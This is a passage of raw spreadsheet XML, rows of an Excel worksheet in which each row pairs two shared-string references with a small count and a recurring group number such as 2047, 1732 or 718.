      </c>
      <c r="D19232">
        <v>2047</v>
      </c>
    </row>
    <row r="19233" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19233" t="s">
        <v>16231</v>
      </c>
      <c r="B19233" t="s">
        <v>16212</v>
      </c>
      <c r="C19233">
        <v>0</v>
      </c>
      <c r="D19233">
        <v>2047</v>
      </c>
    </row>
    <row r="19234" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19234" t="s">
        <v>16228</v>
      </c>
      <c r="B19234" t="s">
        <v>16213</v>
      </c>
      <c r="C19234">
        <v>0</v>
      </c>
      <c r="D19234">
        <v>2047</v>
      </c>
    </row>
    <row r="19235" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19235" t="s">
        <v>16231</v>
      </c>
      <c r="B19235" t="s">
        <v>16214</v>
      </c>
      <c r="C19235">
        <v>0</v>
      </c>
      <c r="D19235">
        <v>2047</v>
      </c>
    </row>
    <row r="19236" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19236" t="s">
        <v>16228</v>
      </c>
      <c r="B19236" t="s">
        <v>16215</v>
      </c>
      <c r="C19236">
        <v>3</v>
      </c>
      <c r="D19236">
        <v>2047</v>
      </c>
    </row>
    <row r="19237" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19237" t="s">
        <v>16231</v>
      </c>
      <c r="B19237" t="s">
        <v>16216</v>
      </c>
      <c r="C19237">
        <v>3</v>
      </c>
      <c r="D19237">
        <v>2047</v>
      </c>
    </row>
    <row r="19238" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19238" t="s">
        <v>16228</v>
      </c>
      <c r="B19238" t="s">
        <v>16217</v>
      </c>
      <c r="C19238">
        <v>10</v>
      </c>
      <c r="D19238">
        <v>2047</v>
      </c>
    </row>
    <row r="19239" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19239" t="s">
        <v>16231</v>
      </c>
      <c r="B19239" t="s">
        <v>16218</v>
      </c>
      <c r="C19239">
        <v>7</v>
      </c>
      <c r="D19239">
        <v>2047</v>
      </c>
    </row>
    <row r="19240" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19240" t="s">
        <v>16229</v>
      </c>
      <c r="B19240" t="s">
        <v>16219</v>
      </c>
      <c r="C19240">
        <v>0</v>
      </c>
      <c r="D19240">
        <v>2047</v>
      </c>
    </row>
    <row r="19241" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19241" t="s">
        <v>16230</v>
      </c>
      <c r="B19241" t="s">
        <v>16220</v>
      </c>
      <c r="C19241">
        <v>0</v>
      </c>
      <c r="D19241">
        <v>2047</v>
      </c>
    </row>
    <row r="19242" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19242" t="s">
        <v>16229</v>
      </c>
      <c r="B19242" t="s">
        <v>16221</v>
      </c>
      <c r="C19242">
        <v>2</v>
      </c>
      <c r="D19242">
        <v>2047</v>
      </c>
    </row>
    <row r="19243" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19243" t="s">
        <v>16230</v>
      </c>
      <c r="B19243" t="s">
        <v>16222</v>
      </c>
      <c r="C19243">
        <v>16</v>
      </c>
      <c r="D19243">
        <v>2047</v>
      </c>
    </row>
    <row r="19244" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19244" t="s">
        <v>16223</v>
      </c>
      <c r="B19244" t="s">
        <v>16223</v>
      </c>
      <c r="C19244">
        <v>26</v>
      </c>
      <c r="D19244">
        <v>2047</v>
      </c>
    </row>
    <row r="19245" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19245" t="s">
        <v>16224</v>
      </c>
      <c r="B19245" t="s">
        <v>16224</v>
      </c>
      <c r="C19245">
        <v>1</v>
      </c>
      <c r="D19245">
        <v>2047</v>
      </c>
    </row>
    <row r="19246" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19246" t="s">
        <v>16228</v>
      </c>
      <c r="B19246" t="s">
        <v>16211</v>
      </c>
      <c r="C19246">
        <v>0</v>
      </c>
      <c r="D19246">
        <v>1732</v>
      </c>
    </row>
    <row r="19247" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19247" t="s">
        <v>16231</v>
      </c>
      <c r="B19247" t="s">
        <v>16212</v>
      </c>
      <c r="C19247">
        <v>0</v>
      </c>
      <c r="D19247">
        <v>1732</v>
      </c>
    </row>
    <row r="19248" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19248" t="s">
        <v>16228</v>
      </c>
      <c r="B19248" t="s">
        <v>16213</v>
      </c>
      <c r="C19248">
        <v>2</v>
      </c>
      <c r="D19248">
        <v>1732</v>
      </c>
    </row>
    <row r="19249" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19249" t="s">
        <v>16231</v>
      </c>
      <c r="B19249" t="s">
        <v>16214</v>
      </c>
      <c r="C19249">
        <v>5</v>
      </c>
      <c r="D19249">
        <v>1732</v>
      </c>
    </row>
    <row r="19250" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19250" t="s">
        <v>16228</v>
      </c>
      <c r="B19250" t="s">
        <v>16215</v>
      </c>
      <c r="C19250">
        <v>9</v>
      </c>
      <c r="D19250">
        <v>1732</v>
      </c>
    </row>
    <row r="19251" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19251" t="s">
        <v>16231</v>
      </c>
      <c r="B19251" t="s">
        <v>16216</v>
      </c>
      <c r="C19251">
        <v>2</v>
      </c>
      <c r="D19251">
        <v>1732</v>
      </c>
    </row>
    <row r="19252" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19252" t="s">
        <v>16228</v>
      </c>
      <c r="B19252" t="s">
        <v>16217</v>
      </c>
      <c r="C19252">
        <v>2</v>
      </c>
      <c r="D19252">
        <v>1732</v>
      </c>
    </row>
    <row r="19253" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19253" t="s">
        <v>16231</v>
      </c>
      <c r="B19253" t="s">
        <v>16218</v>
      </c>
      <c r="C19253">
        <v>0</v>
      </c>
      <c r="D19253">
        <v>1732</v>
      </c>
    </row>
    <row r="19254" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19254" t="s">
        <v>16229</v>
      </c>
      <c r="B19254" t="s">
        <v>16219</v>
      </c>
      <c r="C19254">
        <v>6</v>
      </c>
      <c r="D19254">
        <v>1732</v>
      </c>
    </row>
    <row r="19255" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19255" t="s">
        <v>16230</v>
      </c>
      <c r="B19255" t="s">
        <v>16220</v>
      </c>
      <c r="C19255">
        <v>4</v>
      </c>
      <c r="D19255">
        <v>1732</v>
      </c>
    </row>
    <row r="19256" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19256" t="s">
        <v>16229</v>
      </c>
      <c r="B19256" t="s">
        <v>16221</v>
      </c>
      <c r="C19256">
        <v>0</v>
      </c>
      <c r="D19256">
        <v>1732</v>
      </c>
    </row>
    <row r="19257" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19257" t="s">
        <v>16230</v>
      </c>
      <c r="B19257" t="s">
        <v>16222</v>
      </c>
      <c r="C19257">
        <v>0</v>
      </c>
      <c r="D19257">
        <v>1732</v>
      </c>
    </row>
    <row r="19258" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19258" t="s">
        <v>16223</v>
      </c>
      <c r="B19258" t="s">
        <v>16223</v>
      </c>
      <c r="C19258">
        <v>25</v>
      </c>
      <c r="D19258">
        <v>1732</v>
      </c>
    </row>
    <row r="19259" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19259" t="s">
        <v>16224</v>
      </c>
      <c r="B19259" t="s">
        <v>16224</v>
      </c>
      <c r="C19259">
        <v>1</v>
      </c>
      <c r="D19259">
        <v>1732</v>
      </c>
    </row>
    <row r="19260" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19260" t="s">
        <v>16228</v>
      </c>
      <c r="B19260" t="s">
        <v>16211</v>
      </c>
      <c r="C19260">
        <v>0</v>
      </c>
      <c r="D19260">
        <v>718</v>
      </c>
    </row>
    <row r="19261" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19261" t="s">
        <v>16231</v>
      </c>
      <c r="B19261" t="s">
        <v>16212</v>
      </c>
      <c r="C19261">
        <v>0</v>
      </c>
      <c r="D19261">
        <v>718</v>
      </c>
    </row>
    <row r="19262" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19262" t="s">
        <v>16228</v>
      </c>
      <c r="B19262" t="s">
        <v>16213</v>
      </c>
      <c r="C19262">
        <v>0</v>
      </c>
      <c r="D19262">
        <v>718</v>
      </c>
    </row>
    <row r="19263" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19263" t="s">
        <v>16231</v>
      </c>
      <c r="B19263" t="s">
        <v>16214</v>
      </c>
      <c r="C19263">
        <v>0</v>
      </c>
      <c r="D19263">
        <v>718</v>
      </c>
    </row>
    <row r="19264" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19264" t="s">
        <v>16228</v>
      </c>
      <c r="B19264" t="s">
        <v>16215</v>
      </c>
      <c r="C19264">
        <v>5</v>
      </c>
      <c r="D19264">
        <v>718</v>
      </c>
    </row>
    <row r="19265" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19265" t="s">
        <v>16231</v>
      </c>
      <c r="B19265" t="s">
        <v>16216</v>
      </c>
      <c r="C19265">
        <v>8</v>
      </c>
      <c r="D19265">
        <v>718</v>
      </c>
    </row>
    <row r="19266" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19266" t="s">
        <v>16228</v>
      </c>
      <c r="B19266" t="s">
        <v>16217</v>
      </c>
      <c r="C19266">
        <v>10</v>
      </c>
      <c r="D19266">
        <v>718</v>
      </c>
    </row>
    <row r="19267" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19267" t="s">
        <v>16231</v>
      </c>
      <c r="B19267" t="s">
        <v>16218</v>
      </c>
      <c r="C19267">
        <v>15</v>
      </c>
      <c r="D19267">
        <v>718</v>
      </c>
    </row>
    <row r="19268" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19268" t="s">
        <v>16229</v>
      </c>
      <c r="B19268" t="s">
        <v>16219</v>
      </c>
      <c r="C19268">
        <v>0</v>
      </c>
      <c r="D19268">
        <v>718</v>
      </c>
    </row>
    <row r="19269" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19269" t="s">
        <v>16230</v>
      </c>
      <c r="B19269" t="s">
        <v>16220</v>
      </c>
      <c r="C19269">
        <v>0</v>
      </c>
      <c r="D19269">
        <v>718</v>
      </c>
    </row>
    <row r="19270" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19270" t="s">
        <v>16229</v>
      </c>
      <c r="B19270" t="s">
        <v>16221</v>
      </c>
      <c r="C19270">
        <v>20</v>
      </c>
      <c r="D19270">
        <v>718</v>
      </c>
    </row>
    <row r="19271" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19271" t="s">
        <v>16230</v>
      </c>
      <c r="B19271" t="s">
        <v>16222</v>
      </c>
      <c r="C19271">
        <v>30</v>
      </c>
      <c r="D19271">
        <v>718</v>
      </c>
    </row>
    <row r="19272" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19272" t="s">
        <v>16223</v>
      </c>
      <c r="B19272" t="s">
        <v>16223</v>
      </c>
      <c r="C19272">
        <v>30</v>
      </c>
      <c r="D19272">
        <v>718</v>
      </c>
    </row>
    <row r="19273" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19273" t="s">
        <v>16224</v>
      </c>
      <c r="B19273" t="s">
        <v>16224</v>
      </c>
      <c r="C19273">
        <v>0</v>
      </c>
      <c r="D19273">
        <v>718</v>
      </c>
    </row>
    <row r="19274" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19274" t="s">
        <v>16228</v>
      </c>
      <c r="B19274" t="s">
        <v>16211</v>
      </c>
      <c r="C19274">
        <v>0</v>
      </c>
      <c r="D19274">
        <v>1403</v>
      </c>
    </row>
    <row r="19275" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19275" t="s">
        <v>16231</v>
      </c>
      <c r="B19275" t="s">
        <v>16212</v>
      </c>
      <c r="C19275">
        <v>0</v>
      </c>
      <c r="D19275">
        <v>1403</v>
      </c>
    </row>
    <row r="19276" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19276" t="s">
        <v>16228</v>
      </c>
      <c r="B19276" t="s">
        <v>16213</v>
      </c>
      <c r="C19276">
        <v>0</v>
      </c>
      <c r="D19276">
        <v>1403</v>
      </c>
    </row>
    <row r="19277" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19277" t="s">
        <v>16231</v>
      </c>
      <c r="B19277" t="s">
        <v>16214</v>
      </c>
      <c r="C19277">
        <v>0</v>
      </c>
      <c r="D19277">
        <v>1403</v>
      </c>
    </row>
    <row r="19278" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19278" t="s">
        <v>16228</v>
      </c>
      <c r="B19278" t="s">
        <v>16215</v>
      </c>
      <c r="C19278">
        <v>1</v>
      </c>
      <c r="D19278">
        <v>1403</v>
      </c>
    </row>
    <row r="19279" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19279" t="s">
        <v>16231</v>
      </c>
      <c r="B19279" t="s">
        <v>16216</v>
      </c>
      <c r="C19279">
        <v>1</v>
      </c>
      <c r="D19279">
        <v>1403</v>
      </c>
    </row>
    <row r="19280" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19280" t="s">
        <v>16228</v>
      </c>
      <c r="B19280" t="s">
        <v>16217</v>
      </c>
      <c r="C19280">
        <v>15</v>
      </c>
      <c r="D19280">
        <v>1403</v>
      </c>
    </row>
    <row r="19281" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19281" t="s">
        <v>16231</v>
      </c>
      <c r="B19281" t="s">
        <v>16218</v>
      </c>
      <c r="C19281">
        <v>0</v>
      </c>
      <c r="D19281">
        <v>1403</v>
      </c>
    </row>
    <row r="19282" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19282" t="s">
        <v>16229</v>
      </c>
      <c r="B19282" t="s">
        <v>16219</v>
      </c>
      <c r="C19282">
        <v>0</v>
      </c>
      <c r="D19282">
        <v>1403</v>
      </c>
    </row>
    <row r="19283" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19283" t="s">
        <v>16230</v>
      </c>
      <c r="B19283" t="s">
        <v>16220</v>
      </c>
      <c r="C19283">
        <v>0</v>
      </c>
      <c r="D19283">
        <v>1403</v>
      </c>
    </row>
    <row r="19284" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19284" t="s">
        <v>16229</v>
      </c>
      <c r="B19284" t="s">
        <v>16221</v>
      </c>
      <c r="C19284">
        <v>0</v>
      </c>
      <c r="D19284">
        <v>1403</v>
      </c>
    </row>
    <row r="19285" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19285" t="s">
        <v>16230</v>
      </c>
      <c r="B19285" t="s">
        <v>16222</v>
      </c>
      <c r="C19285">
        <v>0</v>
      </c>
      <c r="D19285">
        <v>1403</v>
      </c>
    </row>
    <row r="19286" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19286" t="s">
        <v>16223</v>
      </c>
      <c r="B19286" t="s">
        <v>16223</v>
      </c>
      <c r="C19286">
        <v>20</v>
      </c>
      <c r="D19286">
        <v>1403</v>
      </c>
    </row>
    <row r="19287" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19287" t="s">
        <v>16224</v>
      </c>
      <c r="B19287" t="s">
        <v>16224</v>
      </c>
      <c r="C19287">
        <v>0</v>
      </c>
      <c r="D19287">
        <v>1403</v>
      </c>
    </row>
    <row r="19288" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19288" t="s">
        <v>16228</v>
      </c>
      <c r="B19288" t="s">
        <v>16211</v>
      </c>
      <c r="C19288">
        <v>0</v>
      </c>
      <c r="D19288">
        <v>5541</v>
      </c>
    </row>
    <row r="19289" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19289" t="s">
        <v>16231</v>
      </c>
      <c r="B19289" t="s">
        <v>16212</v>
      </c>
      <c r="C19289">
        <v>0</v>
      </c>
      <c r="D19289">
        <v>5541</v>
      </c>
    </row>
    <row r="19290" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19290" t="s">
        <v>16228</v>
      </c>
      <c r="B19290" t="s">
        <v>16213</v>
      </c>
      <c r="C19290">
        <v>0</v>
      </c>
      <c r="D19290">
        <v>5541</v>
      </c>
    </row>
    <row r="19291" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19291" t="s">
        <v>16231</v>
      </c>
      <c r="B19291" t="s">
        <v>16214</v>
      </c>
      <c r="C19291">
        <v>0</v>
      </c>
      <c r="D19291">
        <v>5541</v>
      </c>
    </row>
    <row r="19292" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19292" t="s">
        <v>16228</v>
      </c>
      <c r="B19292" t="s">
        <v>16215</v>
      </c>
      <c r="C19292">
        <v>2</v>
      </c>
      <c r="D19292">
        <v>5541</v>
      </c>
    </row>
    <row r="19293" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19293" t="s">
        <v>16231</v>
      </c>
      <c r="B19293" t="s">
        <v>16216</v>
      </c>
      <c r="C19293">
        <v>1</v>
      </c>
      <c r="D19293">
        <v>5541</v>
      </c>
    </row>
    <row r="19294" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19294" t="s">
        <v>16228</v>
      </c>
      <c r="B19294" t="s">
        <v>16217</v>
      </c>
      <c r="C19294">
        <v>3</v>
      </c>
      <c r="D19294">
        <v>5541</v>
      </c>
    </row>
    <row r="19295" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19295" t="s">
        <v>16231</v>
      </c>
      <c r="B19295" t="s">
        <v>16218</v>
      </c>
      <c r="C19295">
        <v>1</v>
      </c>
      <c r="D19295">
        <v>5541</v>
      </c>
    </row>
    <row r="19296" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19296" t="s">
        <v>16229</v>
      </c>
      <c r="B19296" t="s">
        <v>16219</v>
      </c>
      <c r="C19296">
        <v>1</v>
      </c>
      <c r="D19296">
        <v>5541</v>
      </c>
    </row>
    <row r="19297" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19297" t="s">
        <v>16230</v>
      </c>
      <c r="B19297" t="s">
        <v>16220</v>
      </c>
      <c r="C19297">
        <v>1</v>
      </c>
      <c r="D19297">
        <v>5541</v>
      </c>
    </row>
    <row r="19298" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19298" t="s">
        <v>16229</v>
      </c>
      <c r="B19298" t="s">
        <v>16221</v>
      </c>
      <c r="C19298">
        <v>7</v>
      </c>
      <c r="D19298">
        <v>5541</v>
      </c>
    </row>
    <row r="19299" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19299" t="s">
        <v>16230</v>
      </c>
      <c r="B19299" t="s">
        <v>16222</v>
      </c>
      <c r="C19299">
        <v>1</v>
      </c>
      <c r="D19299">
        <v>5541</v>
      </c>
    </row>
    <row r="19300" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19300" t="s">
        <v>16223</v>
      </c>
      <c r="B19300" t="s">
        <v>16223</v>
      </c>
      <c r="C19300">
        <v>6</v>
      </c>
      <c r="D19300">
        <v>5541</v>
      </c>
    </row>
    <row r="19301" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19301" t="s">
        <v>16224</v>
      </c>
      <c r="B19301" t="s">
        <v>16224</v>
      </c>
      <c r="C19301">
        <v>1</v>
      </c>
      <c r="D19301">
        <v>5541</v>
      </c>
    </row>
    <row r="19302" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19302" t="s">
        <v>16228</v>
      </c>
      <c r="B19302" t="s">
        <v>16211</v>
      </c>
      <c r="C19302">
        <v>0</v>
      </c>
      <c r="D19302">
        <v>5571</v>
      </c>
    </row>
    <row r="19303" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19303" t="s">
        <v>16231</v>
      </c>
      <c r="B19303" t="s">
        <v>16212</v>
      </c>
      <c r="C19303">
        <v>0</v>
      </c>
      <c r="D19303">
        <v>5571</v>
      </c>
    </row>
    <row r="19304" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19304" t="s">
        <v>16228</v>
      </c>
      <c r="B19304" t="s">
        <v>16213</v>
      </c>
      <c r="C19304">
        <v>0</v>
      </c>
      <c r="D19304">
        <v>5571</v>
      </c>
    </row>
    <row r="19305" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19305" t="s">
        <v>16231</v>
      </c>
      <c r="B19305" t="s">
        <v>16214</v>
      </c>
      <c r="C19305">
        <v>0</v>
      </c>
      <c r="D19305">
        <v>5571</v>
      </c>
    </row>
    <row r="19306" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19306" t="s">
        <v>16228</v>
      </c>
      <c r="B19306" t="s">
        <v>16215</v>
      </c>
      <c r="C19306">
        <v>0</v>
      </c>
      <c r="D19306">
        <v>5571</v>
      </c>
    </row>
    <row r="19307" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19307" t="s">
        <v>16231</v>
      </c>
      <c r="B19307" t="s">
        <v>16216</v>
      </c>
      <c r="C19307">
        <v>1</v>
      </c>
      <c r="D19307">
        <v>5571</v>
      </c>
    </row>
    <row r="19308" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19308" t="s">
        <v>16228</v>
      </c>
      <c r="B19308" t="s">
        <v>16217</v>
      </c>
      <c r="C19308">
        <v>1</v>
      </c>
      <c r="D19308">
        <v>5571</v>
      </c>
    </row>
    <row r="19309" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19309" t="s">
        <v>16231</v>
      </c>
      <c r="B19309" t="s">
        <v>16218</v>
      </c>
      <c r="C19309">
        <v>0</v>
      </c>
      <c r="D19309">
        <v>5571</v>
      </c>
    </row>
    <row r="19310" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19310" t="s">
        <v>16229</v>
      </c>
      <c r="B19310" t="s">
        <v>16219</v>
      </c>
      <c r="C19310">
        <v>0</v>
      </c>
      <c r="D19310">
        <v>5571</v>
      </c>
    </row>
    <row r="19311" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19311" t="s">
        <v>16230</v>
      </c>
      <c r="B19311" t="s">
        <v>16220</v>
      </c>
      <c r="C19311">
        <v>1</v>
      </c>
      <c r="D19311">
        <v>5571</v>
      </c>
    </row>
    <row r="19312" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19312" t="s">
        <v>16229</v>
      </c>
      <c r="B19312" t="s">
        <v>16221</v>
      </c>
      <c r="C19312">
        <v>0</v>
      </c>
      <c r="D19312">
        <v>5571</v>
      </c>
    </row>
    <row r="19313" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19313" t="s">
        <v>16230</v>
      </c>
      <c r="B19313" t="s">
        <v>16222</v>
      </c>
      <c r="C19313">
        <v>1</v>
      </c>
      <c r="D19313">
        <v>5571</v>
      </c>
    </row>
    <row r="19314" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19314" t="s">
        <v>16223</v>
      </c>
      <c r="B19314" t="s">
        <v>16223</v>
      </c>
      <c r="C19314">
        <v>28</v>
      </c>
      <c r="D19314">
        <v>5571</v>
      </c>
    </row>
    <row r="19315" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19315" t="s">
        <v>16224</v>
      </c>
      <c r="B19315" t="s">
        <v>16224</v>
      </c>
      <c r="C19315">
        <v>1</v>
      </c>
      <c r="D19315">
        <v>5571</v>
      </c>
    </row>
    <row r="19316" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19316" t="s">
        <v>16228</v>
      </c>
      <c r="B19316" t="s">
        <v>16211</v>
      </c>
      <c r="C19316">
        <v>0</v>
      </c>
      <c r="D19316">
        <v>5594</v>
      </c>
    </row>
    <row r="19317" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19317" t="s">
        <v>16231</v>
      </c>
      <c r="B19317" t="s">
        <v>16212</v>
      </c>
      <c r="C19317">
        <v>0</v>
      </c>
      <c r="D19317">
        <v>5594</v>
      </c>
    </row>
    <row r="19318" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19318" t="s">
        <v>16228</v>
      </c>
      <c r="B19318" t="s">
        <v>16213</v>
      </c>
      <c r="C19318">
        <v>0</v>
      </c>
      <c r="D19318">
        <v>5594</v>
      </c>
    </row>
    <row r="19319" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19319" t="s">
        <v>16231</v>
      </c>
      <c r="B19319" t="s">
        <v>16214</v>
      </c>
      <c r="C19319">
        <v>0</v>
      </c>
      <c r="D19319">
        <v>5594</v>
      </c>
    </row>
    <row r="19320" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19320" t="s">
        <v>16228</v>
      </c>
      <c r="B19320" t="s">
        <v>16215</v>
      </c>
      <c r="C19320">
        <v>2</v>
      </c>
      <c r="D19320">
        <v>5594</v>
      </c>
    </row>
    <row r="19321" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19321" t="s">
        <v>16231</v>
      </c>
      <c r="B19321" t="s">
        <v>16216</v>
      </c>
      <c r="C19321">
        <v>0</v>
      </c>
      <c r="D19321">
        <v>5594</v>
      </c>
    </row>
    <row r="19322" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19322" t="s">
        <v>16228</v>
      </c>
      <c r="B19322" t="s">
        <v>16217</v>
      </c>
      <c r="C19322">
        <v>3</v>
      </c>
      <c r="D19322">
        <v>5594</v>
      </c>
    </row>
    <row r="19323" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19323" t="s">
        <v>16231</v>
      </c>
      <c r="B19323" t="s">
        <v>16218</v>
      </c>
      <c r="C19323">
        <v>0</v>
      </c>
      <c r="D19323">
        <v>5594</v>
      </c>
    </row>
    <row r="19324" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19324" t="s">
        <v>16229</v>
      </c>
      <c r="B19324" t="s">
        <v>16219</v>
      </c>
      <c r="C19324">
        <v>0</v>
      </c>
      <c r="D19324">
        <v>5594</v>
      </c>
    </row>
    <row r="19325" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19325" t="s">
        <v>16230</v>
      </c>
      <c r="B19325" t="s">
        <v>16220</v>
      </c>
      <c r="C19325">
        <v>0</v>
      </c>
      <c r="D19325">
        <v>5594</v>
      </c>
    </row>
    <row r="19326" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19326" t="s">
        <v>16229</v>
      </c>
      <c r="B19326" t="s">
        <v>16221</v>
      </c>
      <c r="C19326">
        <v>6</v>
      </c>
      <c r="D19326">
        <v>5594</v>
      </c>
    </row>
    <row r="19327" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19327" t="s">
        <v>16230</v>
      </c>
      <c r="B19327" t="s">
        <v>16222</v>
      </c>
      <c r="C19327">
        <v>0</v>
      </c>
      <c r="D19327">
        <v>5594</v>
      </c>
    </row>
    <row r="19328" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19328" t="s">
        <v>16223</v>
      </c>
      <c r="B19328" t="s">
        <v>16223</v>
      </c>
      <c r="C19328">
        <v>26</v>
      </c>
      <c r="D19328">
        <v>5594</v>
      </c>
    </row>
    <row r="19329" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19329" t="s">
        <v>16224</v>
      </c>
      <c r="B19329" t="s">
        <v>16224</v>
      </c>
      <c r="C19329">
        <v>0</v>
      </c>
      <c r="D19329">
        <v>5594</v>
      </c>
    </row>
    <row r="19330" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19330" t="s">
        <v>16228</v>
      </c>
      <c r="B19330" t="s">
        <v>16211</v>
      </c>
      <c r="C19330">
        <v>0</v>
      </c>
      <c r="D19330">
        <v>2853</v>
      </c>
    </row>
    <row r="19331" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19331" t="s">
        <v>16231</v>
      </c>
      <c r="B19331" t="s">
        <v>16212</v>
      </c>
      <c r="C19331">
        <v>0</v>
      </c>
      <c r="D19331">
        <v>2853</v>
      </c>
    </row>
    <row r="19332" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19332" t="s">
        <v>16228</v>
      </c>
      <c r="B19332" t="s">
        <v>16213</v>
      </c>
      <c r="C19332">
        <v>0</v>
      </c>
      <c r="D19332">
        <v>2853</v>
      </c>
    </row>
    <row r="19333" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19333" t="s">
        <v>16231</v>
      </c>
      <c r="B19333" t="s">
        <v>16214</v>
      </c>
      <c r="C19333">
        <v>0</v>
      </c>
      <c r="D19333">
        <v>2853</v>
      </c>
    </row>
    <row r="19334" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19334" t="s">
        <v>16228</v>
      </c>
      <c r="B19334" t="s">
        <v>16215</v>
      </c>
      <c r="C19334">
        <v>1</v>
      </c>
      <c r="D19334">
        <v>2853</v>
      </c>
    </row>
    <row r="19335" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19335" t="s">
        <v>16231</v>
      </c>
      <c r="B19335" t="s">
        <v>16216</v>
      </c>
      <c r="C19335">
        <v>8</v>
      </c>
      <c r="D19335">
        <v>2853</v>
      </c>
    </row>
    <row r="19336" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19336" t="s">
        <v>16228</v>
      </c>
      <c r="B19336" t="s">
        <v>16217</v>
      </c>
      <c r="C19336">
        <v>36</v>
      </c>
      <c r="D19336">
        <v>2853</v>
      </c>
    </row>
    <row r="19337" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19337" t="s">
        <v>16231</v>
      </c>
      <c r="B19337" t="s">
        <v>16218</v>
      </c>
      <c r="C19337">
